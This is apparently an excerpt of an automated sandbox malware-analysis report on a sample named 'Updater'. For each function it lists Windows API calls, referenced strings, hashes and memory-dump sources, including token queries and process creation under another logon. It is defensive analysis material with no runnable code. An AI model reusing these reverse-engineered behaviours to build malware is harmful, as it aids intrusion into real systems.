
Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: ddafd9df6f0c19adc37fd33a56e724b14e4caf4fda6fe4ce2978c0f81ac1b63b
Instruction ID: b51fd1dc3585544c4cf898a9ee97694c87f863d1793555ad33cdbcf36855e1d8
Opcode Fuzzy Hash: ddafd9df6f0c19adc37fd33a56e724b14e4caf4fda6fe4ce2978c0f81ac1b63b
Instruction Fuzzy Hash: 26D167B4A043019FCB14DF14C484A2ABBE6FF89714F15885DF89A8B361CB36ED45CB92

Function 0149E135 Relevance: 9.1, APIs: 6, Instructions: 72COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(014BBB35), ref: 0149E164
LocalFree.KERNEL32(01449F00,00000000,0149E229), ref: 0149E176
VirtualFree.KERNEL32(?,00000000,00008000,01449F00,00000000,0149E229), ref: 0149E19A
LocalFree.KERNEL32(00000000,?,00000000,00008000,01449F00,00000000,0149E229), ref: 0149E1EB
RtlLeaveCriticalSection.NTDLL(014BBB35), ref: 0149E219
RtlDeleteCriticalSection.NTDLL(014BBB35), ref: 0149E223

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 52aa9568c1877638949dde596473f3d3c32d141534e92779e877f21f6eeddc84
Instruction ID: bd010ff8ad2dc346e5d6bf97d97ca02014a03d08f0c9b93c5223849b079c37a8
Opcode Fuzzy Hash: 52aa9568c1877638949dde596473f3d3c32d141534e92779e877f21f6eeddc84
Instruction Fuzzy Hash: D0218E74E08248EFEF31EBE9D895B9D7FA4E718310F10449BE554AB7B9C2309940DB21

Function 00732875 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007320BE: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007320D4
Part of subcall function 007320BE: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007320E0
Part of subcall function 007320BE: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007320EF
Part of subcall function 007320BE: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007320F6
Part of subcall function 007320BE: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0073210C

GetLengthSid.ADVAPI32(?,00000000,00732443), ref: 007328C6
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007328D2
HeapAlloc.KERNEL32(00000000), ref: 007328D9
CopySid.ADVAPI32(00000000,00000000,?), ref: 007328F2
GetProcessHeap.KERNEL32(00000000,00000000,00732443), ref: 00732906
HeapFree.KERNEL32(00000000), ref: 0073290D

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 9ccb9e21cdda3fe1fc8acbafdd0eae6255d1e819a80ce06c92b218af0c6d2665
Instruction ID: ec9c8d72f3e7d0c30ca6218f3a81e98551345091e4f734a34fdf5044678a658d
Opcode Fuzzy Hash: 9ccb9e21cdda3fe1fc8acbafdd0eae6255d1e819a80ce06c92b218af0c6d2665
Instruction Fuzzy Hash: 5E11B171A11309FFEB249F64DC09BEE7769EF45315F108018E842A7222C77AAD06DBA4

Function 007325DE Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0073260F
OpenProcessToken.ADVAPI32(00000000), ref: 00732616
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00732625
CloseHandle.KERNEL32(00000004), ref: 00732630
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0073265F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00732673

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 7ad9d02f1d9e674aa75d77d49873654f8543274bfa9fb5245986d995647ff54c
Instruction ID: c4751302987d91f74c8735d972d4bdf8034947cb33323246d08e3e0a404bc05f
Opcode Fuzzy Hash: 7ad9d02f1d9e674aa75d77d49873654f8543274bfa9fb5245986d995647ff54c
Instruction Fuzzy Hash: 58114A7260124DFBEB118F94DD49FDA7BA9EF08304F048054FA05A2161C2BA8E61EB61

Function 00702C4B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006F490E,?,00000002,?,006F54B1,006F621F), ref: 00702C4F
_free.LIBCMT ref: 00702C82
_free.LIBCMT ref: 00702CAA
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,006F621F,00000000), ref: 00702CB7
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,006F621F,00000000), ref: 00702CC3
_abort.LIBCMT ref: 00702CC9

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: af246d2d837578ba22550107d2f22802278684ddcb56851cdd4af444f805159b
Instruction ID: 14e6e08db4c31e89abe992a8f22781fc69ab585a585a7f789e7aa2c99aa1846f
Opcode Fuzzy Hash: af246d2d837578ba22550107d2f22802278684ddcb56851cdd4af444f805159b
Instruction Fuzzy Hash: F5F08C37604601E6E3227329AD4EA5F25D99BC1761F358315FA15922E3EE6D8C038136

Function 007361D2 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007361F7
GetDeviceCaps.GDI32(00000000,00000058), ref: 00736208
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0073620F
ReleaseDC.USER32(00000000,00000000), ref: 00736217
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0073622E
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00736240

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 442c76a0c1ba27fb5c7155481cf87205681bf4587229848f159b2fe97bde95b3
Instruction ID: be1b2dfba187b2f3b648e9bc640fe0ef2a150305045ab0dee68cf1b9083fe395
Opcode Fuzzy Hash: 442c76a0c1ba27fb5c7155481cf87205681bf4587229848f159b2fe97bde95b3
Instruction Fuzzy Hash: 86014475E00318BBEB209BA59C49A5EBFB8EB48751F008066FA09A7291D674DD10CFA5

Function 0076940F Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 006E3B38: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006E3B92
Part of subcall function 006E3B38: SelectObject.GDI32(?,00000000), ref: 006E3BA1
Part of subcall function 006E3B38: BeginPath.GDI32(?), ref: 006E3BB8
Part of subcall function 006E3B38: SelectObject.GDI32(?,00000000), ref: 006E3BE1

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00769439
LineTo.GDI32(?,00000003,00000000), ref: 0076944D
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 0076945B
LineTo.GDI32(?,00000000,00000003), ref: 0076946B
EndPath.GDI32(?), ref: 0076947B
StrokePath.GDI32(?), ref: 0076948B

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 198ac30a1197b9f493acb48c4d4ac444ecebf3d2bbefc55294d3a58b9b9c465c
Instruction ID: 3f9623c1a23295d0b044781d12b81e3d50397186851ed0885ef0cd7802064984
Opcode Fuzzy Hash: 198ac30a1197b9f493acb48c4d4ac444ecebf3d2bbefc55294d3a58b9b9c465c
Instruction Fuzzy Hash: E1111B7250025CBFDF129F94DC88EAA7F6DEB09350F00C011FA1A5A161C7B5AD56DBA4

Function 014A23C2 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0149F809: GetKeyboardType.USER32(00000000), ref: 0149F80E
Part of subcall function 0149F809: GetKeyboardType.USER32(00000001), ref: 0149F81A

GetCommandLineA.KERNEL32 ref: 014A2428
GetVersion.KERNEL32 ref: 014A243C
GetVersion.KERNEL32 ref: 014A244D
GetCurrentThreadId.KERNEL32 ref: 014A2489

Part of subcall function 0149F839: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F85B
Part of subcall function 0149F839: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0149F8AA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F88E
Part of subcall function 0149F839: RegCloseKey.ADVAPI32(?,0149F8B1,00000000,?,00000004,00000000,0149F8AA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F8A4

GetThreadLocale.KERNEL32 ref: 014A2469

Part of subcall function 014A22F9: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,014A235F), ref: 014A231F

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID:
API String ID: 3734044017-0
Opcode ID: 830eaa0441c967f3b572e54c67b144755ac7df38f0d45f48535cb44bb915c3eb
Instruction ID: 3219372fa7230dc73123de8ced63f0c2197662c727a0c297e652a5f2ef9bb3af
Opcode Fuzzy Hash: 830eaa0441c967f3b572e54c67b144755ac7df38f0d45f48535cb44bb915c3eb
Instruction Fuzzy Hash: 1B012DA1D443838BEB30BFF6A54871C3E61EB31304F95046F84844A2B9E7784015D767

Function 007289E2 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 007289FB
SendMessageW.USER32(?,00001328,00000000,?), ref: 00728A12
GetWindowDC.USER32(?), ref: 00728A1E
GetPixel.GDI32(00000000,?,?), ref: 00728A2D
ReleaseDC.USER32(?,00000000), ref: 00728A3F
GetSysColor.USER32(00000005), ref: 00728A59

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 9f86360a6b0a28d48517d0b41deedb88ead4f4f89a51327e5c99ac3415da308b
Instruction ID: 591ed4edb469d0cb2ab1007f3dceae955257348d15f7117d7b9ac4b2948be9d6
Opcode Fuzzy Hash: 9f86360a6b0a28d48517d0b41deedb88ead4f4f89a51327e5c99ac3415da308b
Instruction Fuzzy Hash: 0B01BC31901215EFDB609B64EC08BF97BB1FB04320F118161FA16A60A1CF791E91EB16

Function 0073298E Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00732999
UnloadUserProfile.USERENV(?,?), ref: 007329A5
CloseHandle.KERNEL32(?), ref: 007329AE
CloseHandle.KERNEL32(?), ref: 007329B6
GetProcessHeap.KERNEL32(00000000,?), ref: 007329BF
HeapFree.KERNEL32(00000000), ref: 007329C6

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 86b7155669ede8b80f09697276ddde540f28a25643b99aeb6bc1835b7ec7acda
Instruction ID: 80caea9145a646e84b0b27dbb8759d2af171ef7e7e0c87ce7ab2d120a2bbd743
Opcode Fuzzy Hash: 86b7155669ede8b80f09697276ddde540f28a25643b99aeb6bc1835b7ec7acda
Instruction Fuzzy Hash: 4FE0ED76614249FBDB111FE2EC0C905BF39FF493217118220F22692170CBB65C20DB55

Function 0076472C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007647EA
IsMenu.USER32(?), ref: 007647FF
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00764847
DrawMenuBar.USER32 ref: 0076485A

Strings

0, xrefs: 00764739

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 4f4b7db95fe3a6cd84bbdcc1054662f1c4f3193c890892ad2e3276fdd2cbd1bd
Instruction ID: c27bbe7e25dc67998f847f01b090f252614932da299e2eafaa9b6e1601f924fd
Opcode Fuzzy Hash: 4f4b7db95fe3a6cd84bbdcc1054662f1c4f3193c890892ad2e3276fdd2cbd1bd
Instruction Fuzzy Hash: AC416874A0138AEFDF20CF55D894AAABBB9FF85714F048129FD06A7251C738AD50CB94

Function 00732E91 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00732F15
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00732F28
SendMessageW.USER32(?,00000189,?,00000000), ref: 00732F58

Part of subcall function 006DF82C: _wcslen.LIBCMT ref: 006DF83F

Strings

ComboBox, xrefs: 00732E9F
ListBox, xrefs: 00732ED4

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 73778b3c4ee8a8b0baa6392de06ad3a0b9d8bd41f0174fa56c815d5e2997e721
Instruction ID: 474f012e35735facd457411f5766bdd23851df346812e9bcb0bc17d5c112e2f2
Opcode Fuzzy Hash: 73778b3c4ee8a8b0baa6392de06ad3a0b9d8bd41f0174fa56c815d5e2997e721
Instruction Fuzzy Hash: CC212871E00105AEEB14AB74C845DFEB77ADF45360F11821AF816A32E2DB395C0A9660

Function 00734024 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006DF82C: _wcslen.LIBCMT ref: 006DF83F

Part of subcall function 00733E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00733EB2
Part of subcall function 00733E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733EC3
Part of subcall function 00733E94: GetCurrentThreadId.KERNEL32 ref: 00733ECA
Part of subcall function 00733E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,0073368B), ref: 00733ED1

GetFocus.USER32 ref: 0073404B
GetParent.USER32(00000000), ref: 00734068
GetClassNameW.USER32(?,?,00000100), ref: 007340A7
EnumChildWindows.USER32(?,00734110), ref: 007340CF

Strings

%s%d, xrefs: 007340E3

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: b1ad5a5aecb70c13f788fabb4753f928f3fef3dbf62ca4a8e00847ac9afdf5a1
Instruction ID: 415d94c7212cfdbc3ea40216884b2c7270820db4e848b932fc5206aa67992649
Opcode Fuzzy Hash: b1ad5a5aecb70c13f788fabb4753f928f3fef3dbf62ca4a8e00847ac9afdf5a1
Instruction Fuzzy Hash: 3D21C671B00205ABDF24AF70DC89AF9777AEF84310F0480A5FE0A97243DA796D459BB5

Function 014B5AB9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,014B5ED0), ref: 014B5AEE
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 014B5AFB

Strings

C:\temp\, xrefs: 014B5B36
kernel32.dll, xrefs: 014B5AE9
GlobalMemoryStatusEx, xrefs: 014B5AF5

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: C:\temp\$GlobalMemoryStatusEx$kernel32.dll
API String ID: 1646373207-1236151733
Opcode ID: a2d4609ca4986f11f7348bb38e512ae86bdbc62dbab5a36f054a4891c73db127
Instruction ID: 86f42f78634a27f23a851f40e1ccc2b9bb7273f5f63eff43c4ea8cb8e4589ce7
Opcode Fuzzy Hash: a2d4609ca4986f11f7348bb38e512ae86bdbc62dbab5a36f054a4891c73db127
Instruction Fuzzy Hash: B811E0742083408FC712EF69E9C0999BBE4FB2B220769049BE0088F33AE7748C018F71

Function 0149F839 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F85B
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0149F8AA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F88E
RegCloseKey.ADVAPI32(?,0149F8B1,00000000,?,00000004,00000000,0149F8AA,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0149F8A4

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 0149F851
FPUMaskValue, xrefs: 0149F885

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: a178361f35a4bdcfa78d859ac9ba035e9e416d1428482e2a7ae047d8daf00b63
Instruction ID: 9850a7dede8bd8c9bc6355904779c890f50f431bd406d1650afce198402692fd
Opcode Fuzzy Hash: a178361f35a4bdcfa78d859ac9ba035e9e416d1428482e2a7ae047d8daf00b63
Instruction Fuzzy Hash: EE01B576A00209BAEF11EBD1CC42FAD7BACEB14700F2004A6B900DB694E7745614D754

Function 006F4C79 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006F4C2A,00000003,?,006F4BCA,00000003,00799500,0000000C,006F4D21,00000003,00000002), ref: 006F4C99
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006F4CAC
FreeLibrary.KERNEL32(00000000,?,?,?,006F4C2A,00000003,?,006F4BCA,00000003,00799500,0000000C,006F4D21,00000003,00000002,00000000), ref: 006F4CCF

Strings

CorExitProcess, xrefs: 006F4CA4
mscoree.dll, xrefs: 006F4C92

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 27fa94c7479ba2287f3c5c48239c230062ab2b6a98b70bebff952d4a71cb367a
Instruction ID: 51520638704544fc8ab0f04253e54c2cf1d30ce20c4685df86ee21c0f43c47eb
Opcode Fuzzy Hash: 27fa94c7479ba2287f3c5c48239c230062ab2b6a98b70bebff952d4a71cb367a
Instruction Fuzzy Hash: B9F0A430B1020CBBDB259F95DD09BAE7BB6EF04751F004168F90AA6250DB744D40CB84

Function 006E290F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,006E27DC,?,?,006E058E,?,00000001), ref: 006E291B
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006E292D
FreeLibrary.KERNEL32(00000000,?,?,006E27DC,?,?,006E058E,?,00000001), ref: 006E293F

Strings

Wow64DisableWow64FsRedirection, xrefs: 006E2927
kernel32.dll, xrefs: 006E2913

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
